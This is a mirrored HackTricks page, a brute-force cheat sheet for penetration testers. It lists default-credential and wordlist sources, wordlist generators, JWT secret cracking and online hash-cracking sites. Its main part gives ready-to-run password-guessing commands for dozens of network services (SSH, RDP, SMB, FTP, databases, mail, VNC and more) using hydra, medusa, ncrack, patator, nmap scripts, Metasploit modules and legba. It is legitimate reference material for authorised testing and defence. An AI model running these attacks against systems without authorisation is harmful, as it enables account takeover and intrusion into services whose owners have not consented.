mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-20 18:14:15 +00:00
942 lines
35 KiB
Markdown
942 lines
35 KiB
Markdown
|
# Brute Force - CheatSheet
|
|||
|
|
|||
|
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
\
|
|||
|
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
|||
|
Get Access Today:
|
|||
|
|
|||
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
|
|||
|
|
|||
|
{% hint style="success" %}
|
|||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|||
|
|
|||
|
<details>
|
|||
|
|
|||
|
<summary>Support HackTricks</summary>
|
|||
|
|
|||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|||
|
|
|||
|
</details>
|
|||
|
{% endhint %}
|
|||
|
|
|||
|
## Default Credentials
|
|||
|
|
|||
|
**Search in google** for default credentials of the technology that is being used, or **try these links**:
|
|||
|
|
|||
|
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
|
|||
|
* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
|
|||
|
* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm)
|
|||
|
* [**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/)
|
|||
|
* [**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/)
|
|||
|
* [**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list)
|
|||
|
* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv)
|
|||
|
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
|
|||
|
* [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)
|
|||
|
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
|
|||
|
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)
|
|||
|
* [**https://theinfocentric.com/**](https://theinfocentric.com/)
|
|||
|
|
|||
|
## **Create your own Dictionaries**
|
|||
|
|
|||
|
Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
|
|||
|
|
|||
|
### Crunch
|
|||
|
|
|||
|
```bash
|
|||
|
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
|
|||
|
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
|
|||
|
|
|||
|
@ Lower case alpha characters
|
|||
|
, Upper case alpha characters
|
|||
|
% Numeric characters
|
|||
|
^ Special characters including spac
|
|||
|
crunch 6 8 -t ,@@^^%%
|
|||
|
```
|
|||
|
|
|||
|
### Cewl
|
|||
|
|
|||
|
```bash
|
|||
|
cewl example.com -m 5 -w words.txt
|
|||
|
```
|
|||
|
|
|||
|
### [CUPP](https://github.com/Mebus/cupp)
|
|||
|
|
|||
|
Generate passwords based on your knowledge of the victim (names, dates...)
|
|||
|
|
|||
|
```
|
|||
|
python3 cupp.py -h
|
|||
|
```
|
|||
|
|
|||
|
### [Wister](https://github.com/cycurity/wister)
|
|||
|
|
|||
|
A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.
|
|||
|
|
|||
|
```bash
|
|||
|
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
|
|||
|
|
|||
|
__ _______ _____ _______ ______ _____
|
|||
|
\ \ / /_ _|/ ____|__ __| ____| __ \
|
|||
|
\ \ /\ / / | | | (___ | | | |__ | |__) |
|
|||
|
\ \/ \/ / | | \___ \ | | | __| | _ /
|
|||
|
\ /\ / _| |_ ____) | | | | |____| | \ \
|
|||
|
\/ \/ |_____|_____/ |_| |______|_| \_\
|
|||
|
|
|||
|
Version 1.0.3 Cycurity
|
|||
|
|
|||
|
Generating wordlist...
|
|||
|
[########################################] 100%
|
|||
|
Generated 67885 lines.
|
|||
|
|
|||
|
Finished in 0.920s.
|
|||
|
```
|
|||
|
|
|||
|
### [pydictor](https://github.com/LandGrey/pydictor)
|
|||
|
|
|||
|
### Wordlists
|
|||
|
|
|||
|
* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
|
|||
|
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
|
|||
|
* [**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi)
|
|||
|
* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/google/fuzzing/tree/master/dictionaries)
|
|||
|
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
|
|||
|
* [**https://weakpass.com/wordlist/**](https://weakpass.com/wordlist/)
|
|||
|
* [**https://wordlists.assetnote.io/**](https://wordlists.assetnote.io/)
|
|||
|
* [**https://github.com/fssecur3/fuzzlists**](https://github.com/fssecur3/fuzzlists)
|
|||
|
* [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
|
|||
|
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
|
|||
|
|
|||
|
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
\
|
|||
|
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
|||
|
Get Access Today:
|
|||
|
|
|||
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
|
|||
|
|
|||
|
## Services
|
|||
|
|
|||
|
Ordered alphabetically by service name.
|
|||
|
|
|||
|
### AFP
|
|||
|
|
|||
|
```bash
|
|||
|
nmap -p 548 --script afp-brute <IP>
|
|||
|
msf> use auxiliary/scanner/afp/afp_login
|
|||
|
msf> set BLANK_PASSWORDS true
|
|||
|
msf> set USER_AS_PASS true
|
|||
|
msf> set PASS_FILE <PATH_PASSWDS>
|
|||
|
msf> set USER_FILE <PATH_USERS>
|
|||
|
msf> run
|
|||
|
```
|
|||
|
|
|||
|
### AJP
|
|||
|
|
|||
|
```bash
|
|||
|
nmap --script ajp-brute -p 8009 <IP>
|
|||
|
```
|
|||
|
|
|||
|
## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)
|
|||
|
|
|||
|
```bash
|
|||
|
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
|
|||
|
```
|
|||
|
|
|||
|
### Cassandra
|
|||
|
|
|||
|
```bash
|
|||
|
nmap --script cassandra-brute -p 9160 <IP>
|
|||
|
# legba ScyllaDB / Apache Casandra
|
|||
|
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
|
|||
|
```
|
|||
|
|
|||
|
### CouchDB
|
|||
|
|
|||
|
```bash
|
|||
|
msf> use auxiliary/scanner/couchdb/couchdb_login
|
|||
|
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
|
|||
|
```
|
|||
|
|
|||
|
### Docker Registry
|
|||
|
|
|||
|
```
|
|||
|
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
|
|||
|
```
|
|||
|
|
|||
|
### Elasticsearch
|
|||
|
|
|||
|
```
|
|||
|
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
|
|||
|
```
|
|||
|
|
|||
|
### FTP
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -l root -P passwords.txt [-t 32] <IP> ftp
|
|||
|
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
|
|||
|
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
|
|||
|
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
|
|||
|
```
|
|||
|
|
|||
|
### HTTP Generic Brute
|
|||
|
|
|||
|
#### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
|
|||
|
|
|||
|
### HTTP Basic Auth
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
|
|||
|
# Use https-get mode for https
|
|||
|
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
|
|||
|
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
|
|||
|
```
|
|||
|
|
|||
|
### HTTP - NTLM
|
|||
|
|
|||
|
```bash
|
|||
|
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
|
|||
|
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
|
|||
|
```
|
|||
|
|
|||
|
### HTTP - Post Form
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
|
|||
|
# Use https-post-form mode for https
|
|||
|
```
|
|||
|
|
|||
|
For http**s** you have to change from "http-post-form" to "**https-post-form"**
|
|||
|
|
|||
|
### **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle
|
|||
|
|
|||
|
```bash
|
|||
|
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
|
|||
|
# Check also https://github.com/evilsocket/legba/wiki/HTTP
|
|||
|
```
|
|||
|
|
|||
|
### IMAP
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
|
|||
|
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
|
|||
|
nmap -sV --script imap-brute -p <PORT> <IP>
|
|||
|
legba imap --username user --password data/passwords.txt --target localhost:993
|
|||
|
```
|
|||
|
|
|||
|
### IRC
|
|||
|
|
|||
|
```bash
|
|||
|
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
|
|||
|
```
|
|||
|
|
|||
|
### ISCSI
|
|||
|
|
|||
|
```bash
|
|||
|
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
|
|||
|
```
|
|||
|
|
|||
|
### JWT
|
|||
|
|
|||
|
```bash
|
|||
|
#hashcat
|
|||
|
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
|
|||
|
|
|||
|
#https://github.com/Sjord/jwtcrack
|
|||
|
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
|
|||
|
|
|||
|
#John
|
|||
|
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
|
|||
|
|
|||
|
#https://github.com/ticarpi/jwt_tool
|
|||
|
python3 jwt_tool.py -d wordlists.txt <JWT token>
|
|||
|
|
|||
|
#https://github.com/brendan-rius/c-jwt-cracker
|
|||
|
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
|
|||
|
|
|||
|
#https://github.com/mazen160/jwt-pwn
|
|||
|
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
|
|||
|
|
|||
|
#https://github.com/lmammino/jwt-cracker
|
|||
|
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
|
|||
|
```
|
|||
|
|
|||
|
### LDAP
|
|||
|
|
|||
|
```bash
|
|||
|
nmap --script ldap-brute -p 389 <IP>
|
|||
|
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
|
|||
|
```
|
|||
|
|
|||
|
### MQTT
|
|||
|
|
|||
|
```
|
|||
|
ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
|
|||
|
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
|
|||
|
```
|
|||
|
|
|||
|
### Mongo
|
|||
|
|
|||
|
```bash
|
|||
|
nmap -sV --script mongodb-brute -n -p 27017 <IP>
|
|||
|
use auxiliary/scanner/mongodb/mongodb_login
|
|||
|
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
|
|||
|
```
|
|||
|
|
|||
|
### MSSQL
|
|||
|
|
|||
|
[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner)
|
|||
|
```shell
|
|||
|
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
|
|||
|
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
|
|||
|
|
|||
|
# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
|
|||
|
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt
|
|||
|
|
|||
|
# Bruteforce using tickets against the hosts listed on the hosts.txt
|
|||
|
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt
|
|||
|
|
|||
|
# Bruteforce using passwords against the hosts listed on the hosts.txt
|
|||
|
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
|
|||
|
|
|||
|
# Bruteforce using hashes against the hosts listed on the hosts.txt
|
|||
|
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
|
|||
|
```
|
|||
|
|
|||
|
|
|||
|
```bash
|
|||
|
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
|
|||
|
```
|
|||
|
|
|||
|
|
|||
|
### MySQL
|
|||
|
|
|||
|
```bash
|
|||
|
# hydra
|
|||
|
hydra -L usernames.txt -P pass.txt <IP> mysql
|
|||
|
|
|||
|
# msfconsole
|
|||
|
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
|
|||
|
|
|||
|
# medusa
|
|||
|
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
|
|||
|
|
|||
|
#Legba
|
|||
|
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
|
|||
|
```
|
|||
|
|
|||
|
### OracleSQL
|
|||
|
|
|||
|
```bash
|
|||
|
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
|
|||
|
|
|||
|
./odat.py passwordguesser -s $SERVER -d $SID
|
|||
|
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
|
|||
|
|
|||
|
#msf1
|
|||
|
msf> use admin/oracle/oracle_login
|
|||
|
msf> set RHOSTS <IP>
|
|||
|
msf> set RPORT 1521
|
|||
|
msf> set SID <SID>
|
|||
|
|
|||
|
#msf2, this option uses nmap and it fails sometimes for some reason
|
|||
|
msf> use scanner/oracle/oracle_login
|
|||
|
msf> set RHOSTS <IP>
|
|||
|
msf> set RPORTS 1521
|
|||
|
msf> set SID <SID>
|
|||
|
|
|||
|
#for some reason nmap fails sometimes when executing this script
|
|||
|
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
|
|||
|
|
|||
|
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
|
|||
|
```
|
|||
|
|
|||
|
In order to use **oracle\_login** with **patator** you need to **install**:
|
|||
|
|
|||
|
```bash
|
|||
|
pip3 install cx_Oracle --upgrade
|
|||
|
```
|
|||
|
|
|||
|
[Offline OracleSQL hash bruteforce](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** and **11.2.0.3**):
|
|||
|
|
|||
|
```bash
|
|||
|
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
|
|||
|
```
|
|||
|
|
|||
|
### POP
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
|
|||
|
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
|
|||
|
|
|||
|
# Insecure
|
|||
|
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110
|
|||
|
|
|||
|
# SSL
|
|||
|
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
|
|||
|
```
|
|||
|
|
|||
|
### PostgreSQL
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
|
|||
|
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
|
|||
|
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
|
|||
|
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
|
|||
|
use auxiliary/scanner/postgres/postgres_login
|
|||
|
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
|
|||
|
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
|
|||
|
```
|
|||
|
|
|||
|
### PPTP
|
|||
|
|
|||
|
You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)
|
|||
|
|
|||
|
```bash
|
|||
|
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
|
|||
|
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
|
|||
|
```
|
|||
|
|
|||
|
### RDP
|
|||
|
|
|||
|
```bash
|
|||
|
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
|
|||
|
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
|
|||
|
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
|
|||
|
```
|
|||
|
|
|||
|
### Redis
|
|||
|
|
|||
|
```bash
|
|||
|
msf> use auxiliary/scanner/redis/redis_login
|
|||
|
nmap --script redis-brute -p 6379 <IP>
|
|||
|
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
|
|||
|
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
|
|||
|
```
|
|||
|
|
|||
|
### Rexec
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
|
|||
|
```
|
|||
|
|
|||
|
### Rlogin
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
|
|||
|
```
|
|||
|
|
|||
|
### Rsh
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -L <Username_list> rsh://<Victim_IP> -v -V
|
|||
|
```
|
|||
|
|
|||
|
[http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind)
|
|||
|
|
|||
|
### Rsync
|
|||
|
|
|||
|
```bash
|
|||
|
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
|
|||
|
```
|
|||
|
|
|||
|
### RTSP
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -l root -P passwords.txt <IP> rtsp
|
|||
|
```
|
|||
|
|
|||
|
### SFTP
|
|||
|
|
|||
|
```bash
|
|||
|
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
|
|||
|
# Try keys from a folder
|
|||
|
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
|
|||
|
```
|
|||
|
|
|||
|
### SNMP
|
|||
|
|
|||
|
```bash
|
|||
|
msf> use auxiliary/scanner/snmp/snmp_login
|
|||
|
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
|
|||
|
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
|
|||
|
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
|
|||
|
```
|
|||
|
|
|||
|
### SMB
|
|||
|
|
|||
|
```bash
|
|||
|
nmap --script smb-brute -p 445 <IP>
|
|||
|
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
|
|||
|
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]
|
|||
|
```
|
|||
|
|
|||
|
### SMTP
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
|
|||
|
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
|
|||
|
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]
|
|||
|
```
|
|||
|
|
|||
|
### SOCKS
|
|||
|
|
|||
|
```bash
|
|||
|
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
|
|||
|
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
|
|||
|
# With alternative address
|
|||
|
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
|
|||
|
```
|
|||
|
|
|||
|
### SQL Server
|
|||
|
|
|||
|
```bash
|
|||
|
#Use the NetBIOS name of the machine as domain
|
|||
|
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
|||
|
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
|
|||
|
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
|
|||
|
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
|
|||
|
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
|
|||
|
```
|
|||
|
|
|||
|
### SSH
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -l root -P passwords.txt [-t 32] <IP> ssh
|
|||
|
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
|
|||
|
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
|
|||
|
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
|
|||
|
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
|
|||
|
# Try keys from a folder
|
|||
|
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
|
|||
|
```
|
|||
|
|
|||
|
#### Weak SSH keys / Debian predictable PRNG
|
|||
|
|
|||
|
Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced with tools such as [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Pre-generated sets of weak keys are also available such as [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
|
|||
|
|
|||
|
### STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ)
|
|||
|
|
|||
|
The STOMP text protocol is a widely used messaging protocol that **allows seamless communication and interaction with popular message queueing services** such as RabbitMQ, ActiveMQ, HornetQ, and OpenMQ. It provides a standardized and efficient approach to exchange messages and perform various messaging operations.
|
|||
|
|
|||
|
```bash
|
|||
|
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
|
|||
|
```
|
|||
|
|
|||
|
### Telnet
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -l root -P passwords.txt [-t 32] <IP> telnet
|
|||
|
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
|
|||
|
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
|
|||
|
|
|||
|
legba telnet \
|
|||
|
--username admin \
|
|||
|
--password wordlists/passwords.txt \
|
|||
|
--target localhost:23 \
|
|||
|
--telnet-user-prompt "login: " \
|
|||
|
--telnet-pass-prompt "Password: " \
|
|||
|
--telnet-prompt ":~$ " \
|
|||
|
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
|
|||
|
```
|
|||
|
|
|||
|
### VNC
|
|||
|
|
|||
|
```bash
|
|||
|
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
|
|||
|
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
|
|||
|
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
|
|||
|
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
|
|||
|
use auxiliary/scanner/vnc/vnc_login
|
|||
|
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
|
|||
|
legba vnc --target localhost:5901 --password data/passwords.txt
|
|||
|
|
|||
|
#Metasploit
|
|||
|
use auxiliary/scanner/vnc/vnc_login
|
|||
|
set RHOSTS <ip>
|
|||
|
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
|
|||
|
```
|
|||
|
|
|||
|
### Winrm
|
|||
|
|
|||
|
```bash
|
|||
|
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
|||
|
```
|
|||
|
|
|||
|
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|||
|
|
|||
|
\
|
|||
|
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
|||
|
Get Access Today:
|
|||
|
|
|||
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
|
|||
|
|
|||
|
## Local
|
|||
|
|
|||
|
### Online cracking databases
|
|||
|
|
|||
|
* [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1)
|
|||
|
* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value)
|
|||
|
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)
|
|||
|
* [https://crackstation.net/](https://crackstation.net) (Hashes)
|
|||
|
* [https://md5decrypt.net/](https://md5decrypt.net) (MD5)
|
|||
|
* [https://gpuhash.me/](https://gpuhash.me) (Hashes and file hashes)
|
|||
|
* [https://hashes.org/search.php](https://hashes.org/search.php) (Hashes)
|
|||
|
